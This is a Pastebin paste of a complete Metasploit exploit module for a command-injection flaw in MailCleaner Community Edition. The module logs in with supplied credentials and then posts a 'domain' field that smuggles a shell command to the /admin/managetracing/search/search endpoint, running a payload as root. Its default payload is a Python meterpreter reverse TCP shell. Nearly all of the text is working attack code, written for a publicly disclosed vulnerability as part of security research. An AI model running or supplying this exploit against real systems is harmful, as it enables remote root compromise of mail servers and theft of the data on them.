SHARE
TWEET

Untitled

a guest Jul 16th, 2019 95 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. class MetasploitModule < Msf::Exploit::Remote
  2.   Rank = ExcellentRanking
  3.  
  4.   include Msf::Exploit::Remote::HttpClient
  5.  
  6.   def initialize(info={})
  7.     super(update_info(info,
  8.       'Name'           => "Mailcleaner Remote Code Execution",
  9.       'Description'    => %q{
  10.         This module exploits the command injection vulnerability of MailCleaner Community Edition product. An authenticated user can execute an
  11.         operating system command under the context of the web server user which is root.
  12.  
  13.         /admin/managetracing/search/search endpoint takes several user inputs and then pass them to the internal service which is responsible for executing
  14.         operating system command. One of the user input is being passed to the service without proper validation. That cause a command injection vulnerability.
  15.       },
  16.       'License'        => MSF_LICENSE,
  17.       'Author'         =>
  18.         [
  19.           'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
  20.         ],
  21.       'References'     =>
  22.         [
  23.           ['URL', 'https://pentest.blog/advisory-mailcleaner-community-edition-remote-code-execution/']
  24.         ],
  25.       'DefaultOptions'  =>
  26.         {
  27.           'SSL' => true,
  28.           'WfsDelay' => 5,
  29.           'Payload'  => 'python/meterpreter/reverse_tcp'
  30.         },
  31.       'Platform'       => ['python', 'unix'],
  32.       'Arch'           => [ ARCH_PYTHON, ARCH_CMD ],
  33.       'Targets'        =>
  34.         [
  35.           [
  36.             'Python payload',
  37.             {
  38.               'Platform' => 'python',
  39.               'Arch' => ARCH_PYTHON,
  40.             }
  41.           ],
  42.           [
  43.             'Command payload',
  44.             {
  45.               'Platform' => 'unix',
  46.               'Arch' => ARCH_CMD,
  47.               'Payload' =>
  48.               {
  49.                 'BadChars' => "\x26",
  50.               }
  51.             }
  52.           ]
  53.         ],
  54.       'Privileged'     => false,
  55.       'DisclosureDate' => "Dec 19 2018",
  56.       'DefaultTarget'  => 0
  57.     ))
  58.  
  59.     register_options(
  60.       [
  61.         Opt::RPORT(443),
  62.         OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']),
  63.         OptString.new('USERNAME', [true, 'The username to login as']),
  64.         OptString.new('PASSWORD', [true, 'The password to login with'])
  65.       ]
  66.     )
  67.   end
  68.  
  69.   def username
  70.     datastore['USERNAME']
  71.   end
  72.  
  73.   def password
  74.     datastore['PASSWORD']
  75.   end
  76.  
  77.   def auth
  78.     print_status('Performing authentication...')
  79.  
  80.     res = send_request_cgi({
  81.       'method' => 'GET',
  82.       'uri' => normalize_uri(target_uri.path, 'admin/')
  83.     })
  84.  
  85.     if res && !res.get_cookies.empty?
  86.       cookie = res.get_cookies
  87.     else
  88.       fail_with(Failure::UnexpectedReply, 'Did not get cookie-set header from response.')
  89.     end
  90.  
  91.     # Performing authentication
  92.     res = send_request_cgi({
  93.       'method'    => 'POST',
  94.       'uri'       => normalize_uri(target_uri.path, 'admin/'),
  95.       'cookie'    => cookie,
  96.       'vars_post' => {
  97.         'username'  => username,
  98.         'password' => password,
  99.         'submit' => 'Log+in'
  100.       }
  101.     })
  102.  
  103.     if res && res.code == 302
  104.       print_good("Awesome..! Authenticated with #{username}:#{password}")
  105.     else
  106.       fail_with(Failure::NoAccess, 'Credentials are not valid.')
  107.     end
  108.  
  109.     cookie
  110.   end
  111.  
  112.   def exploit
  113.     cookie = auth
  114.  
  115.     if cookie.nil?
  116.       fail_with(Failure::Unknown, 'Something went wrong!')
  117.     end
  118.  
  119.     print_status('Exploiting command injection flaw')
  120.  
  121.     if target['Arch'] == ARCH_PYTHON
  122.       cmd = "';$(python -c \"#{payload.encoded}\");#"
  123.     else
  124.       cmd = "';#{payload.encoded};#"
  125.     end
  126.  
  127.     send_request_cgi({
  128.       'method' => 'POST',
  129.       'uri' => normalize_uri(target_uri.path, 'admin', 'managetracing', 'search', 'search'),
  130.       'cookie'    => cookie,
  131.       'vars_post' => {
  132.         'search' => rand_text_alpha(5),
  133.         'domain' => cmd,
  134.         'submit' => 1
  135.       }
  136.     })
  137.  
  138.   end
  139. end
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top